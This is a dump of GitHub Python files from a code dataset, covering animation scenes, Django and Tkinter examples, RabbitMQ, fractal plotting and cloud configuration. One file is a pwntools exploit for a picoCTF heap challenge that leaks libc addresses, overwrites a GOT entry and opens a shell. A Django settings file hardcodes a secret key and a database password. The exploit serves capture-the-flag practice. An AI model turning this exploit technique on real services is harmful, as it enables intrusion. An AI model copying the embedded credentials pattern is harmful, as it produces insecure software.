Dataset schema (each pipe-separated data row below lists these fields in this order; the `content` field holds the file text, and ⌀ marks nullable values):

- blob_id: string, length 40
- directory_id: string, length 40
- path: string, length 3–281
- content_id: string, length 40
- detected_licenses: list, length 0–57
- license_type: string, 2 classes
- repo_name: string, length 6–116
- snapshot_id: string, length 40
- revision_id: string, length 40
- branch_name: string, 313 classes
- visit_date: timestamp[us]
- revision_date: timestamp[us]
- committer_date: timestamp[us]
- github_id: int64, 18.2k–668M, nullable (⌀)
- star_events_count: int64, 0–102k
- fork_events_count: int64, 0–38.2k
- gha_license_id: string, 17 classes
- gha_event_created_at: timestamp[us]
- gha_created_at: timestamp[us]
- gha_language: string, 107 classes
- src_encoding: string, 20 classes
- language: string, 1 class
- is_vendor: bool, 2 classes
- is_generated: bool, 2 classes
- length_bytes: int64, 4–6.02M
- extension: string, 78 classes
- content: string, length 2–6.02M
- authors: list, length 1
- author: string, length 0–175
8a87063d5cbebd2f8d469e9c7340e405764fc3b7 | 2c995ab8f04f8129372809c10242ea723aac86ef | /FirstTest/Scener.py | 3c5af0f90e8c7030c2b2bea8c9fc66d481daed97 | []
| no_license | ulmoDK/GymMatManimVideos | 002f6a26855a02d69cfc86d6472170dc78fd95d5 | defa85cfc4432807d9addbc82d3d9bd1333180ce | refs/heads/master | 2022-11-26T07:34:00.262388 | 2020-07-21T19:53:17 | 2020-07-21T19:53:17 | 281,488,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,200 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 18 21:28:25 2020
@author: ulmo
"""
import manimlib
from manimlib.imports import *
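# Note: these imports target the old 3Blue1Brown "manimlib" package
# (pre-ManimCE), where Scene, TextMobject and TexMobject all come in via
# the star import above.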
"""
def set_background(self):
background = Rectangle(
width = FRAME_WIDTH,
height = FRAME_HEIGHT,
stroke_width = 0,
fill_color = "#3E746F",
fill_opacity = 1)
self.add(background)
"""
class Scene1(Scene):
def construct(self):
#text = TextMobject("This is a regular text")
#self.play(Write(text))
#self.wait(3)
#set_background(self)
        text1 = TextMobject("This is a sentence")
        text2 = TextMobject("Graphical solution? To what? And why?")
#text2.shift(DOWN*0.1,buff=1)
text2.next_to(text1,DOWN,buff=1)
self.add(text1)
self.wait(1)
self.play(Write(text2))
self.wait(3)
class Scene2(Scene):
def construct(self):
        text = TextMobject("Two equations, 2 unknowns,")
        text.scale(1.5)
        formula1 = TexMobject(r"y=3 \cdot x -2")  # raw string so the backslash reaches LaTeX intact
        formula1.scale(1.5)
        formula2 = TexMobject(r"2 \cdot x", "+", "y", "=", "5", r"-2 \cdot x")
formula2.scale(1.5)
ab = TexMobject("a","b")
self.play(Write(text))
self.play(text.shift,2*UP)
self.play(Write(formula1))
self.play(formula1.shift,1*UP)
self.play(Write(formula2[:-1]))
self.wait(5)
self.play(
ReplacementTransform(formula2[0].copy(),formula2[-1]),
FadeOut(formula2[:2]),
run_time=2,
)
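        # ReplacementTransform morphs a copy of the leading "2*x" term into
        # the trailing "-2*x" while the original left-hand terms fade out,
        # animating the step of moving the term across the equals sign.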
self.play(formula2[2:].shift,1.2*LEFT)
self.wait(2)
#self.play(Transform(for
class FormulaColor1(Scene):
def construct(self):
text = TexMobject("x","=","{a","\\over","b}")
text[0].set_color(RED)
text[1].set_color(BLUE)
text[2].set_color(GREEN)
text[3].set_color(ORANGE)
text[4].set_color("#DC28E2")
self.play(Write(text))
self.wait(2)
if __name__ == "__main__":
S1 = Scene1()
S2 = Scene2()
    # manimlib exposes no module-level play(); in the old 3b1b manim,
    # instantiating a Scene (as above) already runs construct(), and
    # rendering is normally driven from the command line, e.g.:
    #   python -m manim Scener.py Scene1 Scene2
| [
"[email protected]"
]
| |
98c07bc117e7b12342e061b4f05594cc973f2a69 | a5ac50432e169e39d9854a045da6f7ec8b29a997 | /MongoTest/settings.py | 2dbe180fb431b80a6d9801d574cef17fdeb44240 | []
| no_license | burritorepo/Django-MongoDB | 4c8516d2c24b6644c7b2f53156ff9124a9032f46 | 4200bac5f8437d6260924038f2f5968a3d87e5f7 | refs/heads/master | 2020-06-16T11:30:44.109009 | 2019-05-20T04:59:09 | 2019-05-20T04:59:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,416 | py | """
Django settings for MongoTest project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import mongoengine
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c4!mc+h+m)u2=#z#ef1f=+*5^yxrwnr+q1^9df3r0hl!@oz9qq'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
#'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework_mongoengine'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
#'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
#'django.contrib.auth.middleware.AuthenticationMiddleware',
#'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'MongoTest.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'MongoTest.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.dummy'
}
}
_MONGODB_USER = 'hacodewr'
_MONGODB_PASSWD = 'abc123'
_MONGODB_HOST = 'localhost'
_MONGODB_NAME = 'admin'
_MONGODB_DATABASE_HOST = \
'mongodb://%s:%s@%s/%s' \
% (_MONGODB_USER, _MONGODB_PASSWD, _MONGODB_HOST, _MONGODB_NAME)
mongoengine.connect(_MONGODB_NAME, host= _MONGODB_DATABASE_HOST)
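# A document model used with rest_framework_mongoengine would then live in an
# app's models.py; an illustrative sketch (names are made up):
#   import mongoengine
#   class Song(mongoengine.Document):
#       title = mongoengine.StringField(max_length=100)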
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
]
| |
65da08b0f3c75f793eca363ec016e0441370c495 | a47ac7c64cb6bb1f181eadff8e4b24735c19080a | /PythonStudy/9-Tkinter/4-Entry.py | fc6d9a973f75667cf9bcbae7cca69b495df559b5 | [
"MIT"
]
| permissive | CoderTitan/PythonDemo | 6dcc88496b181df959a9d43b963fe43a6e4cb032 | feb5ef8be91451b4622764027ac684972c64f2e0 | refs/heads/master | 2020-03-09T09:15:28.299827 | 2018-08-21T03:43:25 | 2018-08-21T03:43:25 | 128,708,650 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | # Main window
import tkinter
# Validate the entered text
def varileText():
text = entry4.get()
if text != '1':
        print('Correct')
        return True
    print('Wrong')
return False
#
def testInvaild():
    print('invalidcommand was called')
return True
# Create the main window
window = tkinter.Tk()
# Set the window title
window.title('Titanjun')
# Set the window size
window.geometry('400x400')
button = tkinter.Button(window, text='Titan', bg='#ff4040')
button.pack()
'''
Entry widget
Used to display a simple line of text
'''
vari = tkinter.Variable()
entry = tkinter.Entry(window, textvariable=vari)
entry.pack()
# Set the value
vari.set('very good')
# Get the value
print(vari.get())
print(entry.get())
# Read-only (disabled) entry
vari2 = tkinter.Variable()
entry2 = tkinter.Entry(window, textvariable=vari2, state='disabled')
entry2.pack()
# Set the value
vari2.set('very bad')
print(vari2.get())
# Password-style entry: whatever is typed is displayed masked (here as '@')
vari3 = tkinter.Variable()
entry3 = tkinter.Entry(window, textvariable=vari3, show='@', bg='red', fg='white')
entry3.pack()
# Validate whether the input meets the requirement
vari4 = tkinter.Variable()
entry4 = tkinter.Entry(window, textvariable=vari4, validate='key', validatecommand=varileText, invalidcommand=testInvaild)
entry4.pack()
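# Note: tkinter auto-registers a plain Python callable passed as
# validatecommand; with validate='key' it fires on every keystroke, and
# invalidcommand runs whenever the validator returns False. To see the
# *pending* value rather than entry4.get(), you would register the callback
# with percent substitutions, e.g. (sketch):
#   vcmd = (window.register(lambda P: P == '1'), '%P')
#   entry4.config(validatecommand=vcmd)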
# Enter the event loop
window.mainloop()
| [
"[email protected]"
]
| |
9184a3cf90f6c87efee880a5df6da85bea92dc7a | ca0ff73a182fb8daf1478dba04683a5d0c205680 | /Spring/RabbitMQ_in_Depth/CH06/6.1 Direct Exchange.py | 3aea11462e4592c82025cd53d840b48dc2aef0d2 | []
| no_license | DawningTiger/Studio | 3db6c8f3e56600201947ffd0f652c76f663f328b | 0472979ea13ddb5d3a836bc9fc7dbd5d8f710c24 | refs/heads/master | 2023-04-27T18:28:05.502124 | 2019-11-07T05:53:11 | 2019-11-07T05:53:11 | 91,751,549 | 3 | 0 | null | 2023-04-21T20:39:53 | 2017-05-19T01:10:45 | HTML | UTF-8 | Python | false | false | 253 | py | import rabbitpy
with rabbitpy.Connection() as connection:
with connection.channel() as channel:
exchange = rabbitpy.Exchange(channel, 'direct-example',
exchange_type='direct')
exchange.declare()
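        # To route messages through it, a queue would be declared and bound
        # with a routing key; a sketch with made-up names:
        #   queue = rabbitpy.Queue(channel, 'example-queue')
        #   queue.declare()
        #   queue.bind(exchange, 'example-routing-key')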
| [
"[email protected]"
]
| |
4455e765ccd95b4a89c68bf96e906b8007962abf | 0acc2088392251ee40b3a187c4eb5d7bb3a7dfa5 | /dj8amjuly/mtopro/mtoapp/migrations/0001_initial.py | c15e6bab7d701f4e57b729d1212e94e183bccc5c | []
| no_license | devopstools2016/python_django_repo | 5747a54cb3ba89285323ba4b93b7ba22f5a29f5d | ccd61f990eb28639943829e7008982b60a8ed40e | refs/heads/master | 2020-07-25T07:02:04.512779 | 2019-09-13T06:41:50 | 2019-09-13T06:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('cname', models.CharField(max_length=100)),
('cost', models.IntegerField()),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('name', models.CharField(max_length=100)),
('location', models.CharField(max_length=100)),
('email', models.EmailField(max_length=100)),
],
),
migrations.AddField(
model_name='course',
name='student',
field=models.ForeignKey(to='mtoapp.Student'),
),
]
| [
"[email protected]"
]
| |
10d2b852e2f224d780d3d3948914efb1963d11e2 | 4c05c92b6020d0e61a6a110b7562b86a256fc962 | /Turtle Magic.py | 08bbe144a0e10b500e4a1d59011b5ce512e606ad | []
| no_license | Aaron250907/PythonCourse1 | 9bd93696973720c262d49e26be453d3b54e240fd | 43fa7de48333ce953f7c3436cc77b9930e2142de | refs/heads/main | 2023-03-14T03:27:06.844190 | 2021-02-20T09:15:53 | 2021-02-20T09:15:53 | 340,611,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | import turtle
colors = ['red', 'blue','green', 'yellow', 'purple', 'orange']
t = turtle.Pen()
turtle.bgcolor('black')
for x in range(360):
t.pencolor(colors[x%6])
t.width(x/100 + 1)
t.forward(x)
    t.left(59)  # 59 degrees (not a divisor of 360) makes the color arms spiral

turtle.done()  # assumed addition: keeps the window open once drawing finishes
| [
"[email protected]"
]
| |
ca17fee06b16873c1bf01a9602a2b6e6347d8b01 | f675a690b62250847b514ace399c2bb7860528f9 | /ZIFS.py | b0e5818588dee37abcd7d781d37fcfa637c0c83b | []
| no_license | adkingston/final-project-programs | a30b5bb5abcfbb4e95d19030c1e4ab2ec05c5034 | dd7db1a4484194162f756ae702743a05f7c7cd53 | refs/heads/master | 2021-01-13T10:14:31.507196 | 2017-08-18T16:56:21 | 2017-08-18T16:56:21 | 69,599,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | import numpy as np
import matplotlib.pyplot as plt
import pylab as pyl
D, R = np.arange(0.0, 1.0+1e-7, 0.1), np.arange(0.0, 2.0+1.e-7, 0.11)
A = [[a, b] for a in D for b in R]
def z1(s):
return [[0.25*x[0], 0.5*x[1]] for x in s]
def z2(s):
return [[-0.25*x[0]+0.5, -0.5*x[1]+2] for x in s]
def z3(s):
return [[-0.25*x[0] + 0.75, 0.5*x[1] + 1] for x in s]
def z4(s):
return [[0.25*x[0] + 0.75, 0.5*x[1] + 1] for x in s]
def iterations(ifs, seed, steps):
assert isinstance(ifs, list)
if steps < 1:
return seed
else:
        next_step = []
        for func in ifs:
            next_step += func(seed)
        # Recurse once on the union of all maps applied to the current set.
        next_step = iterations(ifs, next_step, steps - 1)
        return next_step
a = [[2., 3.]]
A1 = iterations([z1, z2, z3, z4], a, 7)
X1 = [z[0] for z in A1]
Y1 = [z[1] for z in A1]
# fig = plt.figure()
plt.plot(X1, Y1, 'bo', markersize=1, markeredgewidth=0.1)
pyl.show()
# fig.savefig("C:\\Users\\Alexander\\OneDrive\\Documents\\School
# \\University of St. Andrews\\Year 4\\MT4599
# Dissertation\\Main Document\\images\\A6.png")
# def hausdorff_dist(A, B):
# dists = []
# temp = []
# for a in A:
# for b in B:
# d = math.sqrt(abs(a[0] - b[0])**2 + abs(a[1] - b[1])**2)
# temp.append(d)
# dists.append(min(temp))
# temp = []
# return max(dists)
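# Note on the commented-out hausdorff_dist above: it computes the *directed*
# Hausdorff distance h(A, B) and would need `import math`; the symmetric
# Hausdorff distance is max(h(A, B), h(B, A)).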
| [
"[email protected]"
]
| |
db5ed44277df8a9a1505f2c6cd8133d9978cf85d | 9f487f679ef9cf9399058fa92f682a4f425e90d5 | /2014/pico-ctf/master-challenge/fancy_cache/exploit.py | 80ca9099c4d48c3071c00e862b1730391a09f912 | [
"MIT"
]
| permissive | zachriggle/pwntools-write-ups | 20693babacc4a58f32d403f538f20bd133d36588 | b81859e61c05dc80e8209b8a024a7c6b9691f1b3 | refs/heads/master | 2021-01-17T22:43:20.415143 | 2015-03-14T18:11:19 | 2015-03-14T18:11:19 | 22,653,774 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,075 | py | #!/usr/bin/python
from pwn import *
import socket
import telnetlib
"""
The original client has a pack4/unpack4 method that takes a 32 bit integer
and returns a 4 byte string representing the number in little endian.
With pwntools you have already access to the standard struct.pack and struct.unpack
functions as well as support for packing/unpacking arbitrary-width integers.
"""
CACHE_GET = 0
CACHE_SET = 1
kNotFound = 0x0
kFound = 0x1
kCacheFull = 0x2
def write_string(f, s):
# Packs an 32-bit integer
f.write(p32(len(s)))
f.write(s)
def read_string(f):
# Unpacks a 32-bit integer
size = u32(f.read(4))
return f.read(size)
def cache_get(f, key):
f.write(chr(CACHE_GET))
write_string(f, key)
status = ord(f.read(1))
if status == kNotFound:
return None
assert status == kFound
return read_string(f)
# We need this modified function, because once we hit system('/bin/sh'),
# there will be no more data sent back in the way that the original
# function expects. This causes it to b0rk.
def cache_get2(f, key):
f.write(chr(CACHE_GET))
write_string(f, key)
def cache_set(f, key, value, lifetime):
f.write(chr(CACHE_SET))
write_string(f, key)
status = ord(f.read(1))
if status == kCacheFull:
return False
assert status == kFound
write_string(f, value)
f.write(p32(lifetime))
return True
###settings
local = True
s = socket.socket()
if not local:
target = 'vuln2014.picoctf.com'
port = 4548
else:
target = 'localhost'
port = 1337
s.connect((target, port))
log.info('Target: %s' % target)
f = s.makefile('rw', bufsize=0)
# It's useful to pause the client right after connecting so that you can
# attach to the server with gdb if desired.
# raw_input()
# Command to be executed later, once we've overwritten memcmp@plt.
cmd = '/bin/sh\x00'
# Add an entry to the cache; we will use this command later to spawn the shell.
cache_set(f, cmd, "payload", 1000)
# Add an entry with a negative lifetime. This will fool cache_lookup, because it only checks for zero:
'''
// Skip expired cache entries.
if (entry->lifetime == 0) {
continue;
}
'''
cache_set(f, 'keyAAAA', 'AAAA____', 0xffffffff)
# Request that value, causing it to be deleted from cache
cache_get(f, 'keyAAAA')
'''
// This is how the string struct looks like:
struct string {
size_t length;
size_t capacity;
char *data;
};
'''
# Now, we request the value of a key called '\x04\x00\x00\x00\x00\x00\x00\..."
# but this is read into the old "value" struct (used to be 0x8, 0x0, *(AAAA____)),
# because malloc will re-use this address.
# Leak memcmp address @ 0x804b014
cache_get(f, p32(4)+p32(4)+p32(0x804b014))
# This is read into the old "key" struct (used to be 0x7, 0x0, *(keyAAAA))
# We supply the address of 'printf', so the check will pass & we read whatever is at value->data
cache_get(f, p32(6)+p32(6)+p32(0x8048310))
# Grab memcmp address:
addr_memcmp = u32(cache_get(f, 'printf'))
log.info("Leaking memcmp address: %s", hex(addr_memcmp))
# Calculate system address:
if local:
# This hardcode address works for Ubuntu 12.04, libc v. 2.15
offset = 0x000f2b70
else:
# Does not work anymore :(
offset = 0x142870 + 0x40100
log.info("Subtracting offset: %s", hex(offset))
addr_system = addr_memcmp - offset
log.info("Calculated system address: %s", hex(addr_system))
# Now we have to overwrite memcmp @ 0x804b014. The hints say we can do this with cache_set.
# We'd love to abuse our old cache entry again, but alas, the memory regions have again been
# freed(), due to cache_get seeing a lifetime <= 0.
# We'll restore them, so we can abuse them again to write to 0x804b014.
cache_get(f, p32(4)+p32(4)+p32(0x804b014))
cache_get(f, p32(6)+p32(0)+p32(0x8048310))
log.info("Attempting to overwrite memcmp pointer...")
assert cache_set(f, 'printf', p32(addr_system), 1)
log.info("Running {} on remote box".format(cmd))
log.info(cache_get2(f, cmd))
t = telnetlib.Telnet()
t.sock = s
log.info('Connection established')
t.interact()
| [
"[email protected]"
]
| |
9edb6fb910255cf29713ca49bd8f2e57d1186ea7 | a5aa3e80fe2e97cc9de3d42be873fdf468a68968 | /a10_openstack_lib/resources/a10_scaling_group.py | 312cd817ddd0ea9bc95f2784cacf72012e30ba03 | [
"Apache-2.0"
]
| permissive | Cedev/a10-openstack-lib | 60911420f781db99f9d7456be5c4c707985c3c2d | 23c6a5ae2cfaeb5bb950e96be3a79c3b0e014247 | refs/heads/master | 2020-04-05T22:53:54.765410 | 2016-06-07T23:02:01 | 2016-06-07T23:02:01 | 61,076,970 | 0 | 0 | null | 2016-06-13T23:41:50 | 2016-06-13T23:41:49 | Python | UTF-8 | Python | false | false | 12,633 | py | # Copyright (C) 2016 A10 Networks Inc. All rights reserved.
EXTENSION = 'a10-scaling-group'
SERVICE = "A10_SCALING_GROUP"
SCALING_GROUPS = 'a10_scaling_groups'
SCALING_GROUP = 'a10_scaling_group'
SCALING_GROUP_WORKERS = 'a10_scaling_group_workers'
SCALING_GROUP_WORKER = 'a10_scaling_group_worker'
SCALING_POLICIES = 'a10_scaling_policies'
SCALING_POLICY = 'a10_scaling_policy'
SCALING_ALARMS = 'a10_scaling_alarms'
SCALING_ALARM = 'a10_scaling_alarm'
SCALING_ACTIONS = 'a10_scaling_actions'
SCALING_ACTION = 'a10_scaling_action'
ALARM_UNITS = ['count', 'percentage', 'bytes']
ALARM_AGGREGATIONS = ['avg', 'min', 'max', 'sum']
ALARM_MEASUREMENTS = ['connections', 'memory', 'cpu', 'interface']
ALARM_OPERATORS = ['>=', '>', '<=', '<']
ALARM_PERIOD_UNITS = ['minute', 'hour', 'day']
ACTIONS = ['scale-in', 'scale-out']
RESOURCE_ATTRIBUTE_MAP = {
SCALING_GROUPS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'scaling_policy_id': {
'allow_post': True,
'allow_put': True,
'validate': {
'a10_type:nullable': {
'type:uuid': None,
'a10_type:reference': SCALING_POLICY
}
},
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
}
},
SCALING_GROUP_WORKERS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'scaling_group_id': {
'allow_post': True,
'allow_put': False,
'validate': {
'type:uuid': None,
'a10_type:reference': SCALING_GROUP
},
'is_visible': True
},
'host': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True
},
'username': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True
},
'password': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': False
},
'api_version': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:values': ['2.1', '3.0']
},
'is_visible': True
},
'protocol': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:values': ['http', 'https']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
},
'port': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:range': [0, 65535]
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
},
'nova_instance_id': {
'allow_post': False,
'allow_put': False,
'validate': {
'type:uuid': None
},
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
}
},
SCALING_POLICIES: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'cooldown': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
'default': 300,
},
'min_instances': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
'default': 1,
},
'max_instances': {
'allow_post': True,
'allow_put': True,
'validate': {
'a10_type:nullable': {
'type:non_negative': None
}
},
'convert_to': lambda attr: convert_nullable(attr.convert_to_int),
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
},
'reactions': {
'allow_post': True,
'allow_put': True,
'convert_list_to': lambda attr: attr.convert_kvp_list_to_dict,
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
}
},
SCALING_ALARMS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'aggregation': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['avg', 'min', 'max', 'sum']
},
'is_visible': True,
'convert_to': lambda attr: convert_to_lower,
'default': 'avg'
},
'measurement': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['connections', 'memory', 'cpu', 'interface']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
},
'operator': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['>=', '>', '<=', '<']
},
'is_visible': True
},
'threshold': {
'allow_post': True,
'allow_put': True,
'validate': {
'a10_type:float': None
},
'convert_to': lambda attr: convert_to_float,
'is_visible': True
},
'unit': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['count', 'percentage', 'bytes']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
},
'period': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
},
'period_unit': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['minute', 'hour', 'day']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
}
},
SCALING_ACTIONS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'action': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['scale-in', 'scale-out']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
},
'amount': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
},
}
}
def convert_to_lower(input):
try:
return input.lower()
except AttributeError:
return input
def convert_to_float(input):
try:
return float(input)
except ValueError:
return input
def convert_nullable(convert_value):
def f(input):
if input is not None:
return convert_value(input)
return None
return f
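# For example, convert_nullable(int) maps '5' -> 5 and passes None through
# unchanged, which is what the nullable attribute defaults above rely on.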
def validate_float(data, options):
if not isinstance(data, float):
return "'%s' is not a number" % input
def validate_reference(data, options):
"""Referential integrity is enforced by the data model"""
return None
def validate_nullable(validators):
def f(data, options):
if data is not None:
for rule in options:
value_validator = validators[rule]
reason = value_validator(data, options[rule])
if reason:
return reason
return f
VALIDATORS = {
'a10_type:float': lambda validators: validate_float,
'a10_type:reference': lambda validators: validate_reference,
'a10_type:nullable': validate_nullable
}
| [
"[email protected]"
]
| |
d419a8ab94fbec9063ce80b6bb673d0e9abb7763 | 4e518317ee5b13a24c613fdc1451c88dc89d5fcc | /Fibonacci.py | ea3432eb276d7b7a1bf8c1d95f58120e05e63105 | []
| no_license | nourkhaled/Python | ab7ac8db937463749cabbb8a87f2c4b9c7c6b56f | 83d363b8e1ff1ca0325925a8e4f25403d9d90591 | refs/heads/master | 2020-06-20T02:04:58.872215 | 2019-07-17T13:10:35 | 2019-07-17T13:10:47 | 196,953,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 17 10:23:38 2019
@author: IST
"""
def fibonacci (eleNum):
i= 1
if eleNum == 0 :
fib = []
elif eleNum ==1 :
fib =[1]
elif eleNum ==2:
fib = [1,1]
elif eleNum > 2:
fib = [1,1]
while i < eleNum - 1:
fib.append(fib[i] +fib [i-1])
i+=1
return fib
ele = int(input("Enter the number of Fibonacci terms to generate: "))
print(fibonacci(ele))
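# Example: entering 7 prints [1, 1, 2, 3, 5, 8, 13]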
| [
"[email protected]"
]
| |
07ae406d8c86434e6d9828f79c80cc7113e9e530 | 647d9874e51e617ed351aeff9954e4c7318af6d8 | /attendance/get_data.py | c47ab87db19774cbf6f5059697d76c3e223dbefa | []
| no_license | technophilic/vityBot | 99c33a550503e1b590417c12627420c649ebd5b0 | 6f7a5a43a85bd7da5fd46e3154b46a1cc9b9e296 | refs/heads/master | 2021-01-01T17:08:35.251511 | 2017-07-21T16:35:21 | 2017-07-21T16:35:21 | 98,008,802 | 0 | 0 | null | 2017-07-22T05:19:07 | 2017-07-22T05:19:07 | null | UTF-8 | Python | false | false | 942 | py | import requests
base = 'https://myffcs.in:10443/campus/vellore/'
login = '/login/'
personal_details = '/personalDetails/'
edu_details = '/educationalDetails/'
exam_schedule = '/examSchedule/'
messages = '/messages/'
refresh = '/refresh/'
class LoginError(Exception):
def __init__(self):
self.message = 'Error logging in'
class InvalidCredentials(Exception):
def __init__(self):
self.message = 'Invalid login credentials'
def process_login(login_info):
url = base + login
res = requests.post(url, login_info.getDict())
res_dict = res.json()
if res_dict['status']['code'] == 12:
raise InvalidCredentials
elif res_dict['status']['code'] != 0:
raise LoginError
return res_dict
def get_course_details(login_info):
url = base + refresh
process_login(login_info)
res = requests.post(url, login_info.getDict())
